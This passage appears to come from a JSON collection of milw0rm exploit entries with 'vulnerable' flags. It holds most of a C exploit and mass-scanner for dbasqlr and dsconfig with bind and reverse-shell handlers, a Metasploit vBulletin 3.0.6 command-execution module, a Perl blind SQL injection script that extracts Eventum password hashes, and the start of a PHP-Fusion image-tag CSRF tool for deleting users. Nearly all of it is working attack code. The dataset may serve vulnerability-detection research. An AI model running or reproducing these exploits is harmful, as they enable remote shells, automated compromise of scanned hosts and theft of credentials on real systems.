YELLOW \"e \" NORMAL \"p\" YELLOW \"h\" NORMAL \"u\" YELLOW \"n\" NORMAL \"\\n\" );\n\n\n\n\tFD_ZERO ( &fd_read );\n\n\tFD_SET ( s, &fd_read );\n\n\tFD_SET ( 0, &fd_read );\n\n\n\n\twhile ( 1 )\n\n\t{\n\n\t\tFD_SET ( s, &fd_read );\n\n\t\tFD_SET ( 0, &fd_read );\n\n\n\n\t\tif ( select ( s + 1, &fd_read, NULL, NULL, NULL ) < 0 )\n\n\t\t\tbreak;\n\n\t\tif ( FD_ISSET ( s, &fd_read ) )\n\n\t\t{\n\n\t\t\tif ( ( n = recv ( s, buffer, sizeof ( buffer ), 0 ) ) < 0 )\n\n\t\t\t{\n\n\t\t\t\tprintf ( \"bye bye...\\n\" );\n\n\t\t\t\treturn;\n\n\t\t\t}\n\n\t\t\tif ( write ( 1, buffer, n ) < 0 )\n\n\t\t\t{\n\n\t\t\t\tprintf ( \"bye bye...\\n\" );\n\n\t\t\t\treturn;\n\n\t\t\t}\n\n\t\t}\n\n\t\tif ( FD_ISSET ( 0, &fd_read ) )\n\n\t\t{\n\n\t\t\tif ( ( n = read ( 0, buffer, sizeof ( buffer ) ) ) < 0 )\n\n\t\t\t{\n\n\t\t\t\tprintf ( \"bye bye...\\n\" );\n\n\t\t\t\treturn;\n\n\t\t\t}\n\n\t\t\tif ( send ( s, buffer, n, 0 ) < 0 )\n\n\t\t\t{\n\n\t\t\t\tprintf ( \"bye bye...\\n\" );\n\n\t\t\t\treturn;\n\n\t\t\t}\n\n\t\t}\n\n\t\tusleep(10);\n\n\t}\n\n}\n\n\n\nvoid\n\nconnect_to_bindshell ( char* tip, unsigned short bport )\n\n{\n\n\tint s;\n\n\tint sec = 5; // change this for fast targets\n\n\tstruct sockaddr_in remote_addr;\n\n\tstruct hostent* host_addr;\n\n\n\n\tif ( ( host_addr = gethostbyname ( tip ) ) == NULL )\n\n\t{\n\n\t\tfprintf ( stderr, \"cannot resolve \\\"%s\\\"\\n\", tip );\n\n\t\texit ( 1 );\n\n\t}\n\n\n\n\tremote_addr.sin_family = AF_INET;\n\n\tremote_addr.sin_addr   = * ( ( struct in_addr * ) host_addr->h_addr );\n\n\tremote_addr.sin_port   = htons ( bport );\n\n\n\n\tif ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )\n\n\t{\n\n\t\tprintf ( \"socket failed!\\n\" );\n\n\t\texit ( 1 );\n\n\t}\n\n\tprintf ( \"--[ sleeping %d seconds...\\n\", sec );\n\n\tfall_asleep ( sec );\n\n\tprintf ( \"--[ connecting to %s:%u...\", tip, bport );\n\n\tif ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) ==  -1 )\n\n\t{\n\n\t\tprintf ( RED \"failed!\\n\\n\" NORMAL);\n\n\t\texit ( 1 );\n\n\t}\n\n\tprintf ( YELLOW \"done!\\n\" NORMAL);\n\n\tshell ( s, tip, bport );\n\n}\n\n\n\nvoid\n\nfall_asleep ( int sec )\n\n{\n\n\tsleep ( sec );\n\n}\n\n\n\nvoid\n\nheader ()\n\n{\n\n\tprintf ( YELLOW \"              __              __                   _           \\n\" );\n\n\tprintf ( \"  _______  __/ /_  ___  _____/ /__________  ____  (_)____      \\n\" );\n\n\tprintf ( \" / ___/ / / / __ \\\\/ _ \\\\/ ___/ __/ ___/ __ \\\\/ __ \\\\/ / ___/  \\n\" );\n\n\tprintf ( \"/ /__/ /_/ / /_/ /  __/ /  / /_/ /  / /_/ / / / / / /__        \\n\" );\n\n\tprintf ( \"\\\\___/\\\\__, /_.___/\\\\___/_/   \\\\__/_/   \\\\____/_/ /_/_/\\\\___/  \\n\" );\n\n\tprintf ( \"    /____/                                                     \\n\\n\" NORMAL );\n\n\tprintf ( \"--[ exploit by : cybertronic - cybertronic[at]gmx[dot]net\\n\" );\n\n}\n\n\n\nvoid\n\nparse_arguments ( int argc, char* argv[], args* argp )\n\n{\n\n\tint i = 0;\n\n\n\n\twhile ( ( i = getopt ( argc, argv, \"t:l:p:\" ) ) != -1 )\n\n\t{\n\n\t\tswitch ( i )\n\n\t\t{\n\n\t\t\tcase 't':\n\n\t\t\t\targp->tip = optarg;\n\n\t\t\t\tbreak;\n\n\t\t\tcase 'l':\n\n\t\t\t\targp->lip = optarg;\n\n\t\t\t\tbreak;\n\n\t\t\tcase 'p':\n\n\t\t\t\targp->lport = atoi ( optarg );\n\n\t\t\t\tbreak;\n\n\t\t\tcase ':':\n\n\t\t\tcase '?':\n\n\t\t\tdefault:\n\n\t\t\t\tusage ( argv[0] );\n\n\t    }\n\n    }\n\n\n\n    if ( argp->tip == NULL || argp->lip == NULL ||  argp->lport < 1 || argp->lport > 65535 )\n\n\t\tusage ( argv[0] );\n\n}\n\n\n\nvoid\n\nstart_reverse_handler ( int cbport )\n\n{\n\n\tint s1, s2;\n\n\tstruct sockaddr_in cliaddr, servaddr;\n\n\tsocklen_t clilen = sizeof ( cliaddr );\n\n\n\n\tbzero ( &servaddr, sizeof ( servaddr ) );\n\n\tservaddr.sin_family = AF_INET;\n\n\tservaddr.sin_addr.s_addr = htonl ( INADDR_ANY );\n\n\tservaddr.sin_port = htons ( cbport );\n\n\n\n\tprintf ( \"--[ starting reverse handler [port: %u]...\", cbport );\n\n\tif ( ( s1 = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )\n\n\t{\n\n\t\tprintf ( \"socket failed!\\n\" );\n\n\t\texit ( 1 );\n\n\t}\n\n\tbind ( s1, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );\n\n\tif ( listen ( s1, 1 ) == -1 )\n\n\t{\n\n\t\tprintf ( \"listen failed!\\n\" );\n\n\t\texit ( 1 );\n\n\t}\n\n\tprintf ( YELLOW \"done!\\n\" NORMAL);\n\n\tif ( ( s2 = accept ( s1, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )\n\n\t{\n\n\t\tprintf ( \"accept failed!\\n\" );\n\n\t\texit ( 1 );\n\n\t}\n\n\tclose ( s1 );\n\n\tprintf ( \"--[ incomming connection from:\\t\" YELLOW \" %s\\n\" NORMAL, inet_ntoa ( cliaddr.sin_addr ) );\n\n\tshell ( s2, ( char* ) inet_ntoa ( cliaddr.sin_addr ), cbport );\n\n\tclose ( s2 );\n\n}\n\n\n\nvoid\n\nstart_scanner ( args* argp )\n\n{\n\n\tint i;\n\n\tint s;\n\n\tint fd;\n\n\tint sc;\n\n\tint option;\n\n\tint ip1 = 0, a = 0;\n\n\tint ip2 = 0, b = 0;\n\n\tint ip3 = 0, c = 0;\n\n\tint ip4 = 0, d = 0;\n\n\tint status = 0;\n\n\tchar scan_ip[256];\n\n\tchar end_ip[256];\n\n\tchar line[256];\n\n\tchar system_time[64];\n\n\tunsigned short port;\n\n\tunsigned short xoredcbport;\n\n\tunsigned long BRUTE_DELAY = 100000;\n\n\tunsigned long MAX_CHILDS = 40;\n\n\tunsigned long xoredcbip;\n\n\ttime_t ticks = time ( NULL );\n\n\n\n\tbzero ( &scan_ip, sizeof ( scan_ip ) );\n\n\tbzero ( &end_ip, sizeof ( end_ip ) );\n\n\tbzero ( &system_time, sizeof ( system_time ) );\n\n\n\n\tprintf ( \"\\n\" );\n\n\tprintf ( \"--[ enter IP-range\\n\" );\n\n\tprintf ( \"      |\\n\" );\n\n\tprintf ( \"      |--\" RED \"[\" NORMAL \"start-ip\" RED \"]\" NORMAL );\n\n\tprintf ( \" $ \" );\n\n\tscanf ( \"%s\", scan_ip );\n\n\tsscanf ( scan_ip, \"%u.%u.%u.%u\", &ip1, &ip2, &ip3, &ip4 );\n\n\tif ( !isip ( scan_ip ) )\n\n\t{\n\n\t\tprintf ( \"Invalid IP!\\n\" );\n\n\t\texit ( 1 );\n\n\t}\n\n\tprintf ( \"      `--\" RED \"[\" NORMAL \"end-ip  \" RED \"]\" NORMAL );\n\n\tprintf ( \" $ \" );\n\n\tscanf ( \"%s\", end_ip );\n\n\tsscanf ( end_ip, \"%u.%u.%u.%u\", &a, &b, &c, &d );\n\n\tif ( !isip ( end_ip ) )\n\n\t{\n\n\t\tprintf ( \"Invalid IP!\\n\" );\n\n\t\texit ( 1 );\n\n\t}\n\n\tprintf ( \"\\n\" );\n\n\tprintf ( \"--[ select port to scan for\\n\" );\n\n\tprintf ( \"      |\\n\" );\n\n\tprintf ( \"      |--\" RED \"[\" NORMAL \" 6070\" RED \"]\" NORMAL \" = dbasqlr\\n\" );\n\n\tprintf ( \"      `--\" RED \"[\" NORMAL \"41523\" RED \"]\" NORMAL \" = dsconfig\\n\" );\n\n\tprintf ( \"\\n\" );\n\n\tprintf ( \" $ \" );\n\n\tscanf ( \"%u\", &port );\n\n\tif ( port != 6070 && port != 41523 )\n\n\t{\n\n\t\tprintf ( \"--[ I`m only scanning for port 6070 and 41523!\\n\" );\n\n\t\texit ( 1 );\n\n\t}\n\n\tprintf ( \"\\n\" );\n\n\tprintf ( \"--[ I can try to exploit the bug, shall I ?\\n\" );\n\n\tprintf ( \"      |\\n\" );\n\n\tprintf ( \"      |--\" RED \"[\" NORMAL \"0\" RED \"]\" NORMAL \" yes, try it!\\n\" );\n\n\tprintf ( \"      `--\" RED \"[\" NORMAL \"1\" RED \"]\" NORMAL \" no, i`am on my own!\\n\" );\n\n\tprintf ( \"\\n\" );\n\n\tprintf ( \" $ \" );\n\n\tscanf ( \"%u\", &option );\n\n\tif ( option != 0 && option != 1 )\n\n\t{\n\n\t\tprintf ( \"--[ invalid option!\\n\" );\n\n\t\texit ( 1 );\n\n\t}\n\n\tif ( option == 0 )\n\n\t\tsc = select_shellcode ();\n\n\n\n\tif ( ( fd = open ( \"scan.log\", O_CREAT | O_WRONLY | O_APPEND, S_IREAD | S_IWRITE ) ) == -1 )\n\n\t{\n\n\t\tprintf ( \"open failed!\\n\" );\n\n\t\texit ( 1 );\n\n\t}\n\n\n\n\tsnprintf ( system_time, sizeof ( system_time ) -1, \"\\nDate: %s\\n\\n\", ctime ( &ticks ) );\n\n\tif ( write ( fd, system_time, strlen ( system_time ) -1 ) <= 0 )\n\n\t{\n\n\t\tprintf ( RED \"failed!\\n\" NORMAL);\n\n\t\texit ( 1 );\n\n\t}\n\n\n\n\tprintf ( \"\\noO---[ scanner - scan.log ]---Oo\\n\\n\" );\n\n\n\n\twhile ( 1 )\n\n\t{\n\n\t\tif ( ip3 > 254 ) { ip3 = 1; ip2++; }\n\n\t\tif ( ip2 > 254 ) { ip2 = 1; ip1++; }\n\n\t\tif ( ip1 > 254 )\n\n\t\t\texit ( 0 );\n\n\n\n\t\tfor ( ip4; ip4 < 255; ip4++ )\n\n\t\t{\n\n\t\t\ti++;\n\n\t\t\tbzero ( &scan_ip, sizeof ( scan_ip ) );\n\n\t\t\tsnprintf ( scan_ip, sizeof ( scan_ip ) -1, \"%u.%u.%u.%u\", ip1, ip2, ip3, ip4 );\n\n\t\t\tusleep ( BRUTE_DELAY );\n\n\t\t\tswitch ( fork () )\n\n\t\t\t{\n\n\t\t\t\tcase 0:\n\n\t\t\t\t{\n\n\t\t\t\t\tswitch ( is_open ( scan_ip, port ) )\n\n\t\t\t\t\t{\n\n\t\t\t\t\t\tcase 0:\n\n\t\t\t\t\t\t{\n\n\t\t\t\t\t\t\tprintf ( \"[%s:%d] \" GREEN \"open\" NORMAL \"\\n\", scan_ip, port );\n\n\t\t\t\t\t\t\tbzero ( &line, sizeof ( line ) );\n\n\t\t\t\t\t\t\tsnprintf ( line, sizeof ( line ) -1, \"[%s:%d]\\n\\n\", scan_ip, port );\n\n\t\t\t\t\t\t\tif ( write ( fd, line, strlen ( line ) -1 ) <= 0 )\n\n\t\t\t\t\t\t\t{\n\n\t\t\t\t\t\t\t\tprintf ( RED \"failed!\\n\" NORMAL);\n\n\t\t\t\t\t\t\t\texit ( 1 );\n\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\tif ( option == 0 )\n\n\t\t\t\t\t\t\t{\n\n\t\t\t\t\t\t\t\tprintf ( \"\\n\" );\n\n\t\t\t\t\t\t\t\tprintf ( \"oO---[    exploitation    ]---Oo\\n\" );\n\n\t\t\t\t\t\t\t\tprintf ( \"\\n\" );\n\n\t\t\t\t\t\t\t\ts = connect_to_remote_host ( scan_ip, port );\n\n\t\t\t\t\t\t\t\tswitch( sc )\n\n\t\t\t\t\t\t\t\t{\n\n\t\t\t\t\t\t\t\t\tcase 0:\n\n\t\t\t\t\t\t\t\t\t{\n\n\t\t\t\t\t\t\t\t\t\tif ( port == 6070 )\n\n\t\t\t\t\t\t\t\t\t\t{\n\n\t\t\t\t\t\t\t\t\t\t\tif ( exploit_dbasqlr ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 ) == 1 )\n\n\t\t\t\t\t\t\t\t\t\t\t{\n\n\t\t\t\t\t\t\t\t\t\t\t\tprintf ( \"exploitation failed!\\n\" );\n\n\t\t\t\t\t\t\t\t\t\t\t\texit ( 1 );\n\n\t\t\t\t\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t\t\t\t\tconnect_to_bindshell ( scan_ip, 4444 );\n\n\t\t\t\t\t\t\t\t\t\t\tbreak;\n\n\t\t\t\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t\t\t\telse\n\n\t\t\t\t\t\t\t\t\t\t{\n\n\t\t\t\t\t\t\t\t\t\t\tif ( exploit_dsconfig ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 ) == 1 )\n\n\t\t\t\t\t\t\t\t\t\t\t{\n\n\t\t\t\t\t\t\t\t\t\t\t\tprintf ( \"exploitation failed!\\n\" );\n\n\t\t\t\t\t\t\t\t\t\t\t\texit ( 1 );\n\n\t\t\t\t\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t\t\t\t\tconnect_to_bindshell ( scan_ip, 4444 );\n\n\t\t\t\t\t\t\t\t\t\t\tbreak;\n\n\t\t\t\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t\t\tcase 1:\n\n\t\t\t\t\t\t\t\t\t{\n\n\t\t\t\t\t\t\t\t\t\tif ( port == 6070 )\n\n\t\t\t\t\t\t\t\t\t\t{\n\n\t\t\t\t\t\t\t\t\t\t\txoredcbip = inet_addr ( argp->lip ) ^ ( unsigned long ) 0x99999999;\n\n\t\t\t\t\t\t\t\t\t\t\txoredcbport = htons (  argp->lport ) ^ ( unsigned short ) 0x9999;\n\n\t\t\t\t\t\t\t\t\t\t\tif ( exploit_dbasqlr ( s, xoredcbip, xoredcbport, 0 ) == 1 )\n\n\t\t\t\t\t\t\t\t\t\t\t{\n\n\t\t\t\t\t\t\t\t\t\t\t\tprintf ( \"exploitation failed!\\n\" );\n\n\t\t\t\t\t\t\t\t\t\t\t\texit ( 1 );\n\n\t\t\t\t\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t\t\t\t\tstart_reverse_handler ( argp->lport );\n\n\t\t\t\t\t\t\t\t\t\t\tbreak;\n\n\t\t\t\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t\t\t\telse\n\n\t\t\t\t\t\t\t\t\t\t{\n\n\t\t\t\t\t\t\t\t\t\t\txoredcbip = inet_addr ( argp->lip ) ^ ( unsigned long ) 0x99999999;\n\n\t\t\t\t\t\t\t\t\t\t\txoredcbport = htons ( argp->lport ) ^ ( unsigned short ) 0x9999;\n\n\t\t\t\t\t\t\t\t\t\t\tif ( exploit_dsconfig ( s, xoredcbip, xoredcbport, 0 ) == 1 )\n\n\t\t\t\t\t\t\t\t\t\t\t{\n\n\t\t\t\t\t\t\t\t\t\t\t\tprintf ( \"exploitation failed!\\n\" );\n\n\t\t\t\t\t\t\t\t\t\t\t\texit ( 1 );\n\n\t\t\t\t\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t\t\t\t\tstart_reverse_handler ( argp->lport );\n\n\t\t\t\t\t\t\t\t\t\t\tbreak;\n\n\t\t\t\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\tbreak;\n\n\t\t\t\t\t\t}\n\n\t\t\t\t\t\tcase 1:\n\n\t\t\t\t\t\t\tprintf ( \"[%s:%d] \" RED \"closed\" NORMAL \"\\n\", scan_ip, port );\n\n\t\t\t\t\t\t\tbreak;\n\n\t\t\t\t\t\tdefault:\n\n\t\t\t\t\t\t\tprintf ( \"[%s:%d] \" RED \"closed\" NORMAL \"\\n\", scan_ip, port );\n\n\t\t\t\t\t\t\tbreak;\n\n\t\t\t\t\t}\n\n\t\t\t\t\texit(0);\n\n\t\t\t\t\tbreak;\n\n\t\t\t\t}\n\n\t\t\t\tcase -1:\n\n\t\t\t\t{\n\n\t\t\t\t\tprintf ( \"fork failed!\\n\");\n\n\t\t\t\t\texit ( 1 );\n\n\t\t\t\t\tbreak;\n\n\t\t\t\t}\n\n\t\t\t\tdefault:\n\n\t\t\t\t{\n\n\t\t\t\t\tif ( i > MAX_CHILDS - 2 )\n\n\t\t\t\t\t{\n\n\t\t\t\t\t\twait ( &status );\n\n\t\t\t\t\t\ti--;\n\n\t\t\t\t\t}\n\n\t\t\t\t\tbreak;\n\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif ( ip1 == a && ip2 == b && ip3 == c && ip4 == d )\n\n\t\t\t{\n\n\t\t\t\tclose ( fd );\n\n\t\t\t\tprintf ( \"\\noO---[   scan completed   ]---Oo\\n\\n\" );\n\n\t\t\t\texit ( 0 );\n\n\t\t\t}\n\n\t\t}\n\n\t\tip4 = 1;\n\n\t\tip3++;\n\n\t}\n\n}\n\n\n\nvoid\n\nusage ( char* name )\n\n{\n\n\tint i;\n\n\n\n\tprintf ( \"\\n\" );\n\n\tprintf ( \"Note: all switches have to be specified!\\n\" );\n\n\tprintf ( \"You can choose between bind and cb shellcode later!\\n\" );\n\n\tprintf ( \"\\n\" );\n\n\tprintf ( \"Usage: %s -t <tip> -l <cbip> -p <cbport>\\n\", name );\n\n\tprintf ( \"\\n\" );\n\n\texit ( 1 );\n\n}\n\n\n\nint\n\nmain ( int argc, char* argv[] )\n\n{\n\n\tint s, action, vuln, sc;\n\n\tunsigned long xoredcbip;\n\n\tunsigned short xoredcbport;\n\n\targs myargs;\n\n\n\n\tsystem ( \"clear\" );\n\n\theader ();\n\n\tparse_arguments ( argc, argv, &myargs );\n\n\tif ( !isip ( myargs.tip ) )\n\n\t{\n\n\t\tprintf ( \"Invalid Target IP!\\n\" );\n\n\t\texit ( 1 );\n\n\t}\n\n\tif ( !isip ( myargs.lip ) )\n\n\t{\n\n\t\tprintf ( \"Invalid Connect Back IP!\\n\" );\n\n\t\texit ( 1 );\n\n\t}\n\n\taction = select_action ();\n\n\tif ( !action )\n\n\t\tstart_scanner ( &myargs );\n\n\tvuln = select_vulnerability ();\n\n\tsc = select_shellcode ();\n\n\tswitch ( vuln )\n\n\t{\n\n\t\tcase 0:\n\n\t\t{\n\n\t\t\ts = connect_to_remote_host ( myargs.tip, PORT_DBASQLR );\n\n\t\t\tswitch( sc )\n\n\t\t\t{\n\n\t\t\t\tcase 0:\n\n\t\t\t\t{\n\n\t\t\t\t\tif ( exploit_dbasqlr ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 ) == 1 )\n\n\t\t\t\t\t{\n\n\t\t\t\t\t\tprintf ( \"exploitation failed!\\n\" );\n\n\t\t\t\t\t\texit ( 1 );\n\n\t\t\t\t\t}\n\n\t\t\t\t\tconnect_to_bindshell ( myargs.tip, 4444 );\n\n\t\t\t\t\tbreak;\n\n\t\t\t\t}\n\n\t\t\t\tcase 1:\n\n\t\t\t\t{\n\n\t\t\t\t\txoredcbip = inet_addr ( myargs.lip ) ^ ( unsigned long ) 0x99999999;\n\n\t\t\t\t\txoredcbport = htons (  myargs.lport ) ^ ( unsigned short ) 0x9999;\n\n\t\t\t\t\tif ( exploit_dbasqlr ( s, xoredcbip, xoredcbport, 0 ) == 1 )\n\n\t\t\t\t\t{\n\n\t\t\t\t\t\tprintf ( \"exploitation failed!\\n\" );\n\n\t\t\t\t\t\texit ( 1 );\n\n\t\t\t\t\t}\n\n\t\t\t\t\tstart_reverse_handler ( myargs.lport );\n\n\t\t\t\t\tbreak;\n\n\t\t\t\t}\n\n\t\t\t}\n\n\t\tbreak;\n\n\t\t}\n\n\t\tcase 1:\n\n\t\t{\n\n\t\t\ts = connect_to_remote_host ( myargs.tip, PORT_DSCONFIG );\n\n\t\t\tswitch( sc )\n\n\t\t\t{\n\n\t\t\t\tcase 0:\n\n\t\t\t\t{\n\n\t\t\t\t\tif ( exploit_dsconfig ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 ) == 1 )\n\n\t\t\t\t\t{\n\n\t\t\t\t\t\tprintf ( \"exploitation failed!\\n\" );\n\n\t\t\t\t\t\texit ( 1 );\n\n\t\t\t\t\t}\n\n\t\t\t\t\tconnect_to_bindshell ( myargs.tip, 4444 );\n\n\t\t\t\t\tbreak;\n\n\t\t\t\t}\n\n\t\t\t\tcase 1:\n\n\t\t\t\t{\n\n\t\t\t\t\txoredcbip = inet_addr ( myargs.lip ) ^ ( unsigned long ) 0x99999999;\n\n\t\t\t\t\txoredcbport = htons ( myargs.lport ) ^ ( unsigned short ) 0x9999;\n\n\t\t\t\t\tif ( exploit_dsconfig ( s, xoredcbip, xoredcbport, 0 ) == 1 )\n\n\t\t\t\t\t{\n\n\t\t\t\t\t\tprintf ( \"exploitation failed!\\n\" );\n\n\t\t\t\t\t\texit ( 1 );\n\n\t\t\t\t\t}\n\n\t\t\t\t\tstart_reverse_handler ( myargs.lport );\n\n\t\t\t\t\tbreak;\n\n\t\t\t\t}\n\n\t\t\t}\n\n\t\tbreak;\n\n\t\t}\n\n\t}\n\n}\n\n\n\n// milw0rm.com [2005-08-03]",
710        "vulnerable": true
711    },
712    {
713        "exploit_id": 1133,
714        "content": "##\n\n#        Title: vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit\n\n#    Name: php_vb3_0_6.pm\n\n# License: Artistic/BSD/GPL\n\n#         Info: trying to get the command execution exploits out of the way on milw0rm.com. M's are always good.\n\n#\n\n#\n\n#  - This is an exploit module for the Metasploit Framework, please see\n\n#     http://metasploit.com/projects/Framework for more information.\n\n##\n\n\n\npackage Msf::Exploit::php_vb3_0_6;\n\nuse base \"Msf::Exploit\";\n\nuse strict;\n\nuse Pex::Text;\n\nuse bytes;\n\n\n\nmy $advanced = { };\n\n\n\nmy $info = {\n\n        'Name'     => 'vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit',\n\n        'Version'  => '$Revision: 1.0 $',\n\n        'Authors'  => [ 'str0ke' ],\n\n        'Arch'     => [ ],\n\n        'OS'       => [ ],\n\n        'Priv'     => 0,\n\n        'UserOpts' =>\n\n          {\n\n                'RHOST' => [1, 'ADDR', 'The target address'],\n\n                'RPORT' => [1, 'PORT', 'The target port', 80],\n\n                'VHOST' => [0, 'DATA', 'The virtual host name of the server'],\n\n                'RPATH' => [1, 'DATA', 'Path to the misc.php script', '/forum/misc.php'],\n\n                'SSL'   => [0, 'BOOL', 'Use SSL'],\n\n          },\n\n\n\n        'Description' => Pex::Text::Freeform(qq{\n\n                This module exploits a code execution flaw in vBulletin <= 3.0.6.\n\n}),\n\n\n\n        'Refs' =>\n\n          [\n\n                ['MIL', '832'],\n\n          ],\n\n\n\n        'Payload' =>\n\n          {\n\n                'Space' => 512,\n\n                'Keys'  => ['cmd', 'cmd_bash'],\n\n          },\n\n\n\n        'Keys' => ['vBulletin'],\n\n  };\n\n\n\nsub new {\n\n        my $class = shift;\n\n        my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);\n\n        return($self);\n\n}\n\n\n\nsub Exploit {\n\n        my $self = shift;\n\n        my $target_host    = $self->GetVar('RHOST');\n\n        my $target_port    = $self->GetVar('RPORT');\n\n        my $vhost          = $self->GetVar('VHOST') || $target_host;\n\n        my $path           = $self->GetVar('RPATH');\n\n        my $cmd            = $self->GetVar('EncodedPayload')->RawPayload;\n\n\n\n        # Encode the command as a set of chr() function calls\n\n        my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));\n\n\n\n        # Create the get request data\n\n        my $data = \"?do=page&template={\\${passthru($byte)}}\";\n\n\n\n        my $req =\n\n                \"GET $path$data HTTP/1.1\\r\\n\".\n\n                \"Host: $vhost:$target_port\\r\\n\".\n\n                \"Content-Type: application/html\\r\\n\".\n\n                \"Content-Length: \". length($data).\"\\r\\n\".\n\n                \"Connection: Close\\r\\n\".\n\n                \"\\r\\n\";\n\n\n\n        my $s = Msf::Socket::Tcp->new(\n\n                'PeerAddr'  => $target_host,\n\n                'PeerPort'  => $target_port,\n\n                'LocalPort' => $self->GetVar('CPORT'),\n\n                'SSL'       => $self->GetVar('SSL'),\n\n          );\n\n\n\n        if ($s->IsError){\n\n                $self->PrintLine('[*] Error creating socket: ' . $s->GetError);\n\n                return;\n\n        }\n\n\n\n        $self->PrintLine(\"[*] Sending the malicious vBulletin Get request...\");\n\n\n\n        $s->Send($req);\n\n\n\n        my $results = $s->Recv(-1, 20);\n\n        $s->Close();\n\n\n\n        return;\n\n}\n\n\n\n1;\n\n\n\n# milw0rm.com [2005-08-03]",
715        "vulnerable": true
716    },
717    {
718        "exploit_id": 1134,
719        "content": "#!/usr/bin/perl -w\n\nuse IO::Socket;\n\nuse strict;\n\n\n\nprint \"#################################\\n\";\n\nprint \"#  MySQL Eventum <= v1.5.5 SQL Injection PoC  #\\n\";\n\nprint \"#   James Bercegay // gulftech.org // 7-28-05      #\\n\";\n\nprint \"#################################\\n\";\n\n\n\nmy $host = 'localhost';\n\nmy $path = '/eventum/login.php';\n\nmy $user = '2';\n\nmy $port = 80;\n\nmy $pass = '';\n\n\n\nmy @char = ('0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f');\n\n\n\nprint \"[*] Trying $host\\n\";\n\n\n\nOUTER: for ( my $i = 1; $i < 33; $i++ ) \n\n{\n\nINNER: for ( my $j=0; $j < 16; $j++ )\n\n{\n\nmy $used = $char[$j];\n\nmy $sock = IO::Socket::INET->new( PeerAddr => $host, PeerPort => $port, Proto => 'tcp' ) || die \"[!] Unable to connect to $host\\n\";\n\n\n\nmy $post = \"cat=login&url=&email=%27+UNION+SELECT+%273355d92c04a3332339b767f9278405ff%27+FROM+eventum_user+WHERE+usr_id=$user+AND+MID(usr_password,$i,1)='$used'%2F*&passwd=dance&Submit=Login\";\n\nmy $send = \"POST $path HTTP/1.1\\r\\n\";\n\n$send .= \"Host: $host\\r\\n\";\n\n$send .= \"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6\\r\\n\";\n\n$send .= \"Connection: Keep-Alive\\r\\n\";\n\n$send .= \"Content-type: application/x-www-form-urlencoded\\r\\n\"; \n\n$send .= \"Content-length: \".length($post).\"\\r\\n\\r\\n\";\n\n$send .= \"$post\\r\\n\\r\\n\";\n\n\n\nprint $sock $send;\n\n\n\nwhile ( my $line = <$sock> )\n\n{\n\nif ( $line =~ /(.*)err=7(.*)/is )\n\n{\n\n$pass .= $used;\n\nprint \"[+] Char $i is $used\\n\";\n\nlast INNER;\n\n} \n\n#/if\n\n}\n\n#/while\n\n\n\nclose($sock);\n\n}\n\n#/for INNER\n\n\n\nif ( length($pass) < 1 ) \n\n{\n\nprint \"[!] Host not vulnerable!\";\n\nexit;\n\n}\n\n}\n\n#/for OUTER\n\n\n\nprint \"[+] Pass hash is $pass\\n\";\n\nexit;\n\n\n\n# milw0rm.com [2005-08-05]",
720        "vulnerable": true
721    },
722    {
723        "exploit_id": 1135,
724        "content": "/* \n\n\n\nahh I was hoping for some socket code :( /str0ke\n\n\n\nDark Assassins - http://dark-assassins.com/\n\nVisit us on IRC @ irc.tddirc.net #DarkAssassins\n\n\n\nPHP-Fusion [img][/img] exploit\n\n\n\nDiscovered/Coded by Easyex\n\n\n\nUsing the [img] [/img] codes we can get an administrator to do a function a normal member cannot do.\n\n\n\nFor example..\n\n\n\n[img]/administration/members.php?step=delete&sortby=all&rowstart=0&user_id=1[/img]\n\n\n\nThis could be in our signature, forum post or in a comment post. When an admin views the page with the malicious code it will automatically load and do the function we selected. In the example it would delete the shout box post with the id 1.\n\n\n\nBecause we are using the [img] [/img] code it just shows up as an invalid image.\n\n\n\nCode usage:\n\n\n\n./fusionimg <version> <dir> deluser <start> <end>\n\n./fusionimg <version> <dir> banuser <start> <end>\n\n./fusionimg <version> <dir> delshout <start end>\n\n./fusionimg <version> <dir> deladmin <start end>\n\n\n\n<version> is the PHP-Fusion version. enter 6.x or 5.x depending on the version number.\n\n\n\n<start> is the start point of user id(s)\n\n<end> is the end point of the user id(s)\n\n \n\nSo if we had a vulnerable host running PHP Fusion v6.00.106 or below with say 150 users and we wanted to delete them all we would type ./fusionimg 6.x / deluser 1 150 or if we wanted to delete 1 user that had the id: 5 we would type: ./fusionimg 6.x / deluser 5 5\n\n\n\n*/\n\n\n\n#include <stdio.h>\n\n#include <string.h>\n\n#include <stdlib.h>\n\n\n\n   int usage() {\n\n      printf(\"Usage: ./fusionimg <version> <dir> <option> <start> <end>\\n\");\n\n      printf(\"Example: ./fusionimg 6.x / deluser 1 500\\n\");\n\n      exit(1);\n\n   }\n\n\n\n   int main (int argc, char *argv[]) {\n\n   \n\n   printf(\"\\n\");\n\n   printf(\"PHP-Fusion [img][/img] exploit\\n\");\n\n   printf(\"Coded by Easyex from the Dark Assassins crew\\n\\n\");\n\n   \n\n   